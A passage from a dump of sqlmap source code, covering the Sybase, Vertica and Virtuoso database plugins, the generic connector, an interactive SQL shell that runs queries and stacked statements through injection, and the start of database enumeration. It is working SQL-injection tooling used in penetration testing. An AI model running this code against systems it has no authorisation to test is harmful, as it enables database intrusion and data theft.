return True\n\n        infoMsg = \"testing %s\" % DBMS.SYBASE\n        logger.info(infoMsg)\n\n        if conf.direct:\n            result = True\n        else:\n            result = inject.checkBooleanExpression(\"@@transtate=@@transtate\")\n\n        if result:\n            infoMsg = \"confirming %s\" % DBMS.SYBASE\n            logger.info(infoMsg)\n\n            result = inject.checkBooleanExpression(\"suser_id()=suser_id()\")\n\n            if not result:\n                warnMsg = \"the back-end DBMS is not %s\" % DBMS.SYBASE\n                logger.warning(warnMsg)\n\n                return False\n\n            setDbms(DBMS.SYBASE)\n\n            self.getBanner()\n\n            if not conf.extensiveFp:\n                return True\n\n            infoMsg = \"actively fingerprinting %s\" % DBMS.SYBASE\n            logger.info(infoMsg)\n\n            result = unArrayizeValue(inject.getValue(\"SUBSTRING(@@VERSION,1,1)\"))\n\n            if result and result.isdigit():\n                Backend.setVersion(str(result))\n            else:\n                for version in xrange(12, 16):\n                    result = inject.checkBooleanExpression(\"PATINDEX('%%/%d[./]%%',@@VERSION)>0\" % version)\n\n                    if result:\n                        Backend.setVersion(str(version))\n                        break\n\n            return True\n        else:\n            warnMsg = \"the back-end DBMS is not %s\" % DBMS.SYBASE\n            logger.warning(warnMsg)\n\n            return False\n"
  },
  {
    "path": "sqlmap/plugins/dbms/sybase/syntax.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.convert import getOrds\nfrom plugins.generic.syntax import Syntax as GenericSyntax\n\nclass Syntax(GenericSyntax):\n    @staticmethod\n    def escape(expression, quote=True):\n        \"\"\"\n        >>> Syntax.escape(\"SELECT 'abcdefgh' FROM foobar\") == \"SELECT CHAR(97)+CHAR(98)+CHAR(99)+CHAR(100)+CHAR(101)+CHAR(102)+CHAR(103)+CHAR(104) FROM foobar\"\n        True\n        >>> Syntax.escape(u\"SELECT 'abcd\\xebfgh' FROM foobar\") == \"SELECT CHAR(97)+CHAR(98)+CHAR(99)+CHAR(100)+TO_UNICHAR(235)+CHAR(102)+CHAR(103)+CHAR(104) FROM foobar\"\n        True\n        \"\"\"\n\n        def escaper(value):\n            return \"+\".join(\"%s(%d)\" % (\"CHAR\" if _ < 128 else \"TO_UNICHAR\", _) for _ in getOrds(value))\n\n        return Syntax._escape(expression, quote, escaper)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/sybase/takeover.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.takeover import Takeover as GenericTakeover\n\nclass Takeover(GenericTakeover):\n    def osCmd(self):\n        errMsg = \"on Sybase it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osShell(self):\n        errMsg = \"on Sybase it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osPwn(self):\n        errMsg = \"on Sybase it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osSmb(self):\n        errMsg = \"on Sybase it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/vertica/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.enums import DBMS\nfrom lib.core.settings import VERTICA_SYSTEM_DBS\nfrom lib.core.unescaper import unescaper\n\nfrom plugins.dbms.vertica.enumeration import Enumeration\nfrom plugins.dbms.vertica.filesystem import Filesystem\nfrom plugins.dbms.vertica.fingerprint import Fingerprint\nfrom plugins.dbms.vertica.syntax import Syntax\nfrom plugins.dbms.vertica.takeover import Takeover\nfrom plugins.generic.misc import Miscellaneous\n\nclass VerticaMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):\n    \"\"\"\n    This class defines Vertica methods\n    \"\"\"\n\n    def __init__(self):\n        self.excludeDbsList = VERTICA_SYSTEM_DBS\n\n        for cls in self.__class__.__bases__:\n            cls.__init__(self)\n\n    unescaper[DBMS.VERTICA] = Syntax.escape\n"
  },
  {
    "path": "sqlmap/plugins/dbms/vertica/connector.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\ntry:\n    import vertica_python\nexcept:\n    pass\n\nimport logging\n\nfrom lib.core.common import getSafeExString\nfrom lib.core.data import conf\nfrom lib.core.data import logger\nfrom lib.core.exception import SqlmapConnectionException\nfrom plugins.generic.connector import Connector as GenericConnector\n\nclass Connector(GenericConnector):\n    \"\"\"\n    Homepage: https://github.com/vertica/vertica-python\n    User guide: https://github.com/vertica/vertica-python/blob/master/README.md\n    API: https://www.python.org/dev/peps/pep-0249/\n    License: Apache 2.0\n    \"\"\"\n\n    def connect(self):\n        self.initConnection()\n\n        try:\n            self.connector = vertica_python.connect(host=self.hostname, user=self.user, password=self.password, database=self.db, port=self.port, connection_timeout=conf.timeout)\n        except vertica_python.OperationalError as ex:\n            raise SqlmapConnectionException(getSafeExString(ex))\n\n        self.initCursor()\n        self.printConnected()\n\n    def fetchall(self):\n        try:\n            return self.cursor.fetchall()\n        except vertica_python.ProgrammingError as ex:\n            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, \"(remote) %s\" % getSafeExString(ex))\n            return None\n\n    def execute(self, query):\n        try:\n            self.cursor.execute(query)\n        except (vertica_python.OperationalError, vertica_python.ProgrammingError) as ex:\n            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, \"(remote) %s\" % getSafeExString(ex))\n        except vertica_python.InternalError as ex:\n            raise SqlmapConnectionException(getSafeExString(ex))\n\n        self.connector.commit()\n\n    def select(self, query):\n        self.execute(query)\n        return self.fetchall()\n"
  },
  {
    "path": "sqlmap/plugins/dbms/vertica/enumeration.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.data import logger\nfrom plugins.generic.enumeration import Enumeration as GenericEnumeration\n\nclass Enumeration(GenericEnumeration):\n    def getRoles(self, *args, **kwargs):\n        warnMsg = \"on Vertica it is not possible to enumerate the user roles\"\n        logger.warning(warnMsg)\n\n        return {}\n"
  },
  {
    "path": "sqlmap/plugins/dbms/vertica/filesystem.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom plugins.generic.filesystem import Filesystem as GenericFilesystem\n\nclass Filesystem(GenericFilesystem):\n    pass\n"
  },
  {
    "path": "sqlmap/plugins/dbms/vertica/fingerprint.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.common import Backend\nfrom lib.core.common import Format\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.enums import DBMS\nfrom lib.core.session import setDbms\nfrom lib.core.settings import VERTICA_ALIASES\nfrom lib.request import inject\nfrom plugins.generic.fingerprint import Fingerprint as GenericFingerprint\n\nclass Fingerprint(GenericFingerprint):\n    def __init__(self):\n        GenericFingerprint.__init__(self, DBMS.VERTICA)\n\n    def getFingerprint(self):\n        value = \"\"\n        wsOsFp = Format.getOs(\"web server\", kb.headersFp)\n\n        if wsOsFp:\n            value += \"%s\\n\" % wsOsFp\n\n        if kb.data.banner:\n            dbmsOsFp = Format.getOs(\"back-end DBMS\", kb.bannerFp)\n\n            if dbmsOsFp:\n                value += \"%s\\n\" % dbmsOsFp\n\n        value += \"back-end DBMS: \"\n\n        if not conf.extensiveFp:\n            value += DBMS.VERTICA\n            return value\n\n        actVer = Format.getDbms()\n        blank = \" \" * 15\n        value += \"active fingerprint: %s\" % actVer\n\n        if kb.bannerFp:\n            banVer = kb.bannerFp.get(\"dbmsVersion\")\n\n            if banVer:\n                banVer = Format.getDbms([banVer])\n                value += \"\\n%sbanner parsing fingerprint: %s\" % (blank, banVer)\n\n        htmlErrorFp = Format.getErrorParsedDBMSes()\n\n        if htmlErrorFp:\n            value += \"\\n%shtml error message fingerprint: %s\" % (blank, htmlErrorFp)\n\n        return value\n\n    def checkDbms(self):\n        if not conf.extensiveFp and Backend.isDbmsWithin(VERTICA_ALIASES):\n            setDbms(DBMS.VERTICA)\n\n            self.getBanner()\n\n            return True\n\n        infoMsg = \"testing %s\" % DBMS.VERTICA\n        logger.info(infoMsg)\n\n        # NOTE: Vertica works too without the CONVERT_TO()\n        result = inject.checkBooleanExpression(\"BITSTRING_TO_BINARY(NULL) IS NULL\")\n\n        if result:\n            infoMsg = \"confirming %s\" % DBMS.VERTICA\n            logger.info(infoMsg)\n\n            result = inject.checkBooleanExpression(\"HEX_TO_INTEGER(NULL) IS NULL\")\n\n            if not result:\n                warnMsg = \"the back-end DBMS is not %s\" % DBMS.VERTICA\n                logger.warning(warnMsg)\n\n                return False\n\n            setDbms(DBMS.VERTICA)\n\n            self.getBanner()\n\n            if not conf.extensiveFp:\n                return True\n\n            infoMsg = \"actively fingerprinting %s\" % DBMS.VERTICA\n            logger.info(infoMsg)\n\n            if inject.checkBooleanExpression(\"CALENDAR_HIERARCHY_DAY(NULL) IS NULL\"):\n                Backend.setVersion(\">= 9.0\")\n            else:\n                Backend.setVersion(\"< 9.0\")\n\n            return True\n        else:\n            warnMsg = \"the back-end DBMS is not %s\" % DBMS.VERTICA\n            logger.warning(warnMsg)\n\n            return False\n"
  },
  {
    "path": "sqlmap/plugins/dbms/vertica/syntax.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.convert import getOrds\nfrom plugins.generic.syntax import Syntax as GenericSyntax\n\nclass Syntax(GenericSyntax):\n    @staticmethod\n    def escape(expression, quote=True):\n        \"\"\"\n        >>> Syntax.escape(\"SELECT 'abcdefgh' FROM foobar\") == \"SELECT (CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104)) FROM foobar\"\n        True\n        \"\"\"\n\n        def escaper(value):\n            return \"(%s)\" % \"||\".join(\"CHR(%d)\" % _ for _ in getOrds(value))\n\n        return Syntax._escape(expression, quote, escaper)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/vertica/takeover.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.takeover import Takeover as GenericTakeover\n\nclass Takeover(GenericTakeover):\n    def osCmd(self):\n        errMsg = \"on Vertica it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osShell(self):\n        errMsg = \"on Vertica it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osPwn(self):\n        errMsg = \"on Vertica it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osSmb(self):\n        errMsg = \"on Vertica it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/virtuoso/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.enums import DBMS\nfrom lib.core.settings import VIRTUOSO_SYSTEM_DBS\nfrom lib.core.unescaper import unescaper\nfrom plugins.dbms.virtuoso.enumeration import Enumeration\nfrom plugins.dbms.virtuoso.filesystem import Filesystem\nfrom plugins.dbms.virtuoso.fingerprint import Fingerprint\nfrom plugins.dbms.virtuoso.syntax import Syntax\nfrom plugins.dbms.virtuoso.takeover import Takeover\nfrom plugins.generic.misc import Miscellaneous\n\nclass VirtuosoMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):\n    \"\"\"\n    This class defines Virtuoso methods\n    \"\"\"\n\n    def __init__(self):\n        self.excludeDbsList = VIRTUOSO_SYSTEM_DBS\n\n        for cls in self.__class__.__bases__:\n            cls.__init__(self)\n\n    unescaper[DBMS.VIRTUOSO] = Syntax.escape\n"
  },
  {
    "path": "sqlmap/plugins/dbms/virtuoso/connector.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.connector import Connector as GenericConnector\n\nclass Connector(GenericConnector):\n    def connect(self):\n        errMsg = \"on Virtuoso it is not (currently) possible to establish a \"\n        errMsg += \"direct connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/virtuoso/enumeration.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.data import logger\nfrom plugins.generic.enumeration import Enumeration as GenericEnumeration\n\nclass Enumeration(GenericEnumeration):\n    def getPasswordHashes(self):\n        warnMsg = \"on Virtuoso it is not possible to enumerate the user password hashes\"\n        logger.warning(warnMsg)\n\n        return {}\n\n    def getPrivileges(self, *args, **kwargs):\n        warnMsg = \"on Virtuoso it is not possible to enumerate the user privileges\"\n        logger.warning(warnMsg)\n\n        return {}\n\n    def getRoles(self, *args, **kwargs):\n        warnMsg = \"on Virtuoso it is not possible to enumerate the user roles\"\n        logger.warning(warnMsg)\n\n        return {}\n\n    def searchDb(self):\n        warnMsg = \"on Virtuoso it is not possible to search databases\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def searchTable(self):\n        warnMsg = \"on Virtuoso it is not possible to search tables\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def searchColumn(self):\n        warnMsg = \"on Virtuoso it is not possible to search columns\"\n        logger.warning(warnMsg)\n\n        return []\n\n    def search(self):\n        warnMsg = \"on Virtuoso search option is not available\"\n        logger.warning(warnMsg)\n\n    def getStatements(self):\n        warnMsg = \"on Virtuoso it is not possible to enumerate the SQL statements\"\n        logger.warning(warnMsg)\n\n        return []\n"
  },
  {
    "path": "sqlmap/plugins/dbms/virtuoso/filesystem.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.filesystem import Filesystem as GenericFilesystem\n\nclass Filesystem(GenericFilesystem):\n    def readFile(self, remoteFile):\n        errMsg = \"on Virtuoso it is not possible to read files\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):\n        errMsg = \"on Virtuoso it is not possible to write files\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/virtuoso/fingerprint.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.common import Backend\nfrom lib.core.common import Format\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.enums import DBMS\nfrom lib.core.session import setDbms\nfrom lib.core.settings import VIRTUOSO_ALIASES\nfrom lib.request import inject\nfrom plugins.generic.fingerprint import Fingerprint as GenericFingerprint\n\nclass Fingerprint(GenericFingerprint):\n    def __init__(self):\n        GenericFingerprint.__init__(self, DBMS.VIRTUOSO)\n\n    def getFingerprint(self):\n        value = \"\"\n        wsOsFp = Format.getOs(\"web server\", kb.headersFp)\n\n        if wsOsFp:\n            value += \"%s\\n\" % wsOsFp\n\n        if kb.data.banner:\n            dbmsOsFp = Format.getOs(\"back-end DBMS\", kb.bannerFp)\n\n            if dbmsOsFp:\n                value += \"%s\\n\" % dbmsOsFp\n\n        value += \"back-end DBMS: \"\n\n        if not conf.extensiveFp:\n            value += DBMS.VIRTUOSO\n            return value\n\n        actVer = Format.getDbms()\n        blank = \" \" * 15\n        value += \"active fingerprint: %s\" % actVer\n\n        if kb.bannerFp:\n            banVer = kb.bannerFp.get(\"dbmsVersion\")\n\n            if banVer:\n                banVer = Format.getDbms([banVer])\n                value += \"\\n%sbanner parsing fingerprint: %s\" % (blank, banVer)\n\n        htmlErrorFp = Format.getErrorParsedDBMSes()\n\n        if htmlErrorFp:\n            value += \"\\n%shtml error message fingerprint: %s\" % (blank, htmlErrorFp)\n\n        return value\n\n    def checkDbms(self):\n        if not conf.extensiveFp and Backend.isDbmsWithin(VIRTUOSO_ALIASES):\n            setDbms(DBMS.VIRTUOSO)\n            return True\n\n        infoMsg = \"testing %s\" % DBMS.VIRTUOSO\n        logger.info(infoMsg)\n\n        result = inject.checkBooleanExpression(\"GET_KEYWORD(NULL,NULL) IS NULL\")\n\n        if result:\n            infoMsg = \"confirming %s\" % DBMS.VIRTUOSO\n            logger.info(infoMsg)\n\n            result = inject.checkBooleanExpression(\"RDF_NOW_IMPL() IS NOT NULL\")\n\n            if not result:\n                warnMsg = \"the back-end DBMS is not %s\" % DBMS.VIRTUOSO\n                logger.warning(warnMsg)\n\n                return False\n\n            setDbms(DBMS.VIRTUOSO)\n\n            return True\n        else:\n            warnMsg = \"the back-end DBMS is not %s\" % DBMS.VIRTUOSO\n            logger.warning(warnMsg)\n\n            return False\n"
  },
  {
    "path": "sqlmap/plugins/dbms/virtuoso/syntax.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.convert import getOrds\nfrom plugins.generic.syntax import Syntax as GenericSyntax\n\nclass Syntax(GenericSyntax):\n    @staticmethod\n    def escape(expression, quote=True):\n        \"\"\"\n        >>> Syntax.escape(\"SELECT 'abcdefgh' FROM foobar\") == \"SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar\"\n        True\n        \"\"\"\n\n        def escaper(value):\n            return \"||\".join(\"CHR(%d)\" % _ for _ in getOrds(value))\n\n        return Syntax._escape(expression, quote, escaper)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/virtuoso/takeover.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.takeover import Takeover as GenericTakeover\n\nclass Takeover(GenericTakeover):\n    def osCmd(self):\n        errMsg = \"on Virtuoso it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osShell(self):\n        errMsg = \"on Virtuoso it is not possible to execute commands\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osPwn(self):\n        errMsg = \"on Virtuoso it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osSmb(self):\n        errMsg = \"on Virtuoso it is not possible to establish an \"\n        errMsg += \"out-of-band connection\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/generic/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\npass\n"
  },
  {
    "path": "sqlmap/plugins/generic/connector.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport os\n\nfrom lib.core.data import conf\nfrom lib.core.data import logger\nfrom lib.core.exception import SqlmapFilePathException\nfrom lib.core.exception import SqlmapUndefinedMethod\n\nclass Connector(object):\n    \"\"\"\n    This class defines generic dbms protocol functionalities for plugins.\n    \"\"\"\n\n    def __init__(self):\n        self.connector = None\n        self.cursor = None\n        self.hostname = None\n\n    def initConnection(self):\n        self.user = conf.dbmsUser or \"\"\n        self.password = conf.dbmsPass or \"\"\n        self.hostname = conf.hostname\n        self.port = conf.port\n        self.db = conf.dbmsDb\n\n    def printConnected(self):\n        if self.hostname and self.port:\n            infoMsg = \"connection to %s server '%s:%d' established\" % (conf.dbms, self.hostname, self.port)\n            logger.info(infoMsg)\n\n    def closed(self):\n        if self.hostname and self.port:\n            infoMsg = \"connection to %s server '%s:%d' closed\" % (conf.dbms, self.hostname, self.port)\n            logger.info(infoMsg)\n\n        self.connector = None\n        self.cursor = None\n\n    def initCursor(self):\n        self.cursor = self.connector.cursor()\n\n    def close(self):\n        try:\n            if self.cursor:\n                self.cursor.close()\n            if self.connector:\n                self.connector.close()\n        except Exception as ex:\n            logger.debug(ex)\n        finally:\n            self.closed()\n\n    def checkFileDb(self):\n        if not os.path.exists(self.db):\n            errMsg = \"the provided database file '%s' does not exist\" % self.db\n            raise SqlmapFilePathException(errMsg)\n\n    def connect(self):\n        errMsg = \"'connect' method must be defined \"\n        errMsg += \"inside the specific DBMS plugin\"\n        raise SqlmapUndefinedMethod(errMsg)\n\n    def fetchall(self):\n        errMsg = \"'fetchall' method must be defined \"\n        errMsg += \"inside the specific DBMS plugin\"\n        raise SqlmapUndefinedMethod(errMsg)\n\n    def execute(self, query):\n        errMsg = \"'execute' method must be defined \"\n        errMsg += \"inside the specific DBMS plugin\"\n        raise SqlmapUndefinedMethod(errMsg)\n\n    def select(self, query):\n        errMsg = \"'select' method must be defined \"\n        errMsg += \"inside the specific DBMS plugin\"\n        raise SqlmapUndefinedMethod(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/generic/custom.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom __future__ import print_function\n\nimport re\nimport sys\n\nfrom lib.core.common import Backend\nfrom lib.core.common import dataToStdout\nfrom lib.core.common import getSQLSnippet\nfrom lib.core.common import isStackingAvailable\nfrom lib.core.convert import getUnicode\nfrom lib.core.data import conf\nfrom lib.core.data import logger\nfrom lib.core.dicts import SQL_STATEMENTS\nfrom lib.core.enums import AUTOCOMPLETE_TYPE\nfrom lib.core.enums import DBMS\nfrom lib.core.exception import SqlmapNoneDataException\nfrom lib.core.settings import METADB_SUFFIX\nfrom lib.core.settings import NULL\nfrom lib.core.settings import PARAMETER_SPLITTING_REGEX\nfrom lib.core.shell import autoCompletion\nfrom lib.request import inject\nfrom thirdparty.six.moves import input as _input\n\nclass Custom(object):\n    \"\"\"\n    This class defines custom enumeration functionalities for plugins.\n    \"\"\"\n\n    def __init__(self):\n        pass\n\n    def sqlQuery(self, query):\n        output = None\n        sqlType = None\n        query = query.rstrip(';')\n\n        try:\n            for sqlTitle, sqlStatements in SQL_STATEMENTS.items():\n                for sqlStatement in sqlStatements:\n                    if query.lower().startswith(sqlStatement):\n                        sqlType = sqlTitle\n                        break\n\n            if not re.search(r\"\\b(OPENROWSET|INTO)\\b\", query, re.I) and (not sqlType or \"SELECT\" in sqlType):\n                infoMsg = \"fetching %s query output: '%s'\" % (sqlType if sqlType is not None else \"SQL\", query)\n                logger.info(infoMsg)\n\n                if Backend.isDbms(DBMS.MSSQL):\n                    match = re.search(r\"(\\bFROM\\s+)([^\\s]+)\", query, re.I)\n                    if match and match.group(2).count('.') == 1:\n                        query = query.replace(match.group(0), \"%s%s\" % (match.group(1), match.group(2).replace('.', \".dbo.\")))\n\n                query = re.sub(r\"(?i)\\w+%s\\.?\" % METADB_SUFFIX, \"\", query)\n\n                output = inject.getValue(query, fromUser=True)\n\n                return output\n            elif not isStackingAvailable() and not conf.direct:\n                warnMsg = \"execution of non-query SQL statements is only \"\n                warnMsg += \"available when stacked queries are supported\"\n                logger.warning(warnMsg)\n\n                return None\n            else:\n                if sqlType:\n                    infoMsg = \"executing %s statement: '%s'\" % (sqlType if sqlType is not None else \"SQL\", query)\n                else:\n                    infoMsg = \"executing unknown SQL command: '%s'\" % query\n                logger.info(infoMsg)\n\n                inject.goStacked(query)\n\n                output = NULL\n\n        except SqlmapNoneDataException as ex:\n            logger.warning(ex)\n\n        return output\n\n    def sqlShell(self):\n        infoMsg = \"calling %s shell. To quit type \" % Backend.getIdentifiedDbms()\n        infoMsg += \"'x' or 'q' and press ENTER\"\n        logger.info(infoMsg)\n\n        autoCompletion(AUTOCOMPLETE_TYPE.SQL)\n\n        while True:\n            query = None\n\n            try:\n                query = _input(\"sql-shell> \")\n                query = getUnicode(query, encoding=sys.stdin.encoding)\n                query = query.strip(\"; \")\n            except KeyboardInterrupt:\n                print()\n                errMsg = \"user aborted\"\n                logger.error(errMsg)\n            except EOFError:\n                print()\n                errMsg = \"exit\"\n                logger.error(errMsg)\n                break\n\n            if not query:\n                continue\n\n            if query.lower() in (\"x\", \"q\", \"exit\", \"quit\"):\n                break\n\n            output = self.sqlQuery(query)\n\n            if output and output != \"Quit\":\n                conf.dumper.sqlQuery(query, output)\n\n            elif not output:\n                pass\n\n            elif output != \"Quit\":\n                dataToStdout(\"No output\\n\")\n\n    def sqlFile(self):\n        infoMsg = \"executing SQL statements from given file(s)\"\n        logger.info(infoMsg)\n\n        for filename in re.split(PARAMETER_SPLITTING_REGEX, conf.sqlFile):\n            filename = filename.strip()\n\n            if not filename:\n                continue\n\n            snippet = getSQLSnippet(Backend.getDbms(), filename)\n\n            if snippet and all(query.strip().upper().startswith(\"SELECT\") for query in (_ for _ in snippet.split(';' if ';' in snippet else '\\n') if _)):\n                for query in (_ for _ in snippet.split(';' if ';' in snippet else '\\n') if _):\n                    query = query.strip()\n                    if query:\n                        conf.dumper.sqlQuery(query, self.sqlQuery(query))\n            else:\n                conf.dumper.sqlQuery(snippet, self.sqlQuery(snippet))\n"
  },
  {
    "path": "sqlmap/plugins/generic/databases.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom lib.core.agent import agent\nfrom lib.core.common import arrayizeValue\nfrom lib.core.common import Backend\nfrom lib.core.common import filterNone\nfrom lib.core.common import filterPairValues\nfrom lib.core.common import flattenValue\nfrom lib.core.common import getLimitRange\nfrom lib.core.common import isInferenceAvailable\nfrom lib.core.common import isListLike\nfrom lib.core.common import isNoneValue\nfrom lib.core.common import isNumPosStrValue\nfrom lib.core.common import isTechniqueAvailable\nfrom lib.core.common import parseSqliteTableSchema\nfrom lib.core.common import popValue\nfrom lib.core.common import pushValue\nfrom lib.core.common import readInput\nfrom lib.core.common import safeSQLIdentificatorNaming\nfrom lib.core.common import safeStringFormat\nfrom lib.core.common import singleTimeLogMessage\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.common import unArrayizeValue\nfrom lib.core.common import unsafeSQLIdentificatorNaming\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.data import paths\nfrom lib.core.data import queries\nfrom lib.core.decorators import stackedmethod\nfrom lib.core.dicts import ALTIBASE_TYPES\nfrom lib.core.dicts import FIREBIRD_TYPES\nfrom lib.core.dicts import INFORMIX_TYPES\nfrom lib.core.enums import CHARSET_TYPE\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import EXPECTED\nfrom lib.core.enums import FORK\nfrom lib.core.enums import PAYLOAD\nfrom lib.core.exception import SqlmapMissingMandatoryOptionException\nfrom lib.core.exception import SqlmapNoneDataException\nfrom lib.core.exception import SqlmapUserQuitException\nfrom lib.core.settings import CURRENT_DB\nfrom lib.core.settings import METADB_SUFFIX\nfrom lib.core.settings import PLUS_ONE_DBMSES\nfrom lib.core.settings import REFLECTED_VALUE_MARKER\nfrom lib.core.settings import UPPER_CASE_DBMSES\nfrom lib.core.settings import VERTICA_DEFAULT_SCHEMA\nfrom lib.request import inject\nfrom lib.utils.brute import columnExists\nfrom lib.utils.brute import tableExists\nfrom thirdparty import six\n\nclass Databases(object):\n    \"\"\"\n    This class defines databases' enumeration functionalities for plugins.\n    \"\"\"\n\n    def __init__(self):\n        kb.data.currentDb = \"\"\n        kb.data.cachedDbs = []\n        kb.data.cachedTables = {}\n        kb.data.cachedColumns = {}\n        kb.data.cachedCounts = {}\n        kb.data.dumpedTable = {}\n        kb.data.cachedStatements = []\n\n    def getCurrentDb(self):\n        infoMsg = \"fetching current database\"\n        logger.info(infoMsg)\n\n        query = queries[Backend.getIdentifiedDbms()].current_db.query\n\n        if not kb.data.currentDb:\n            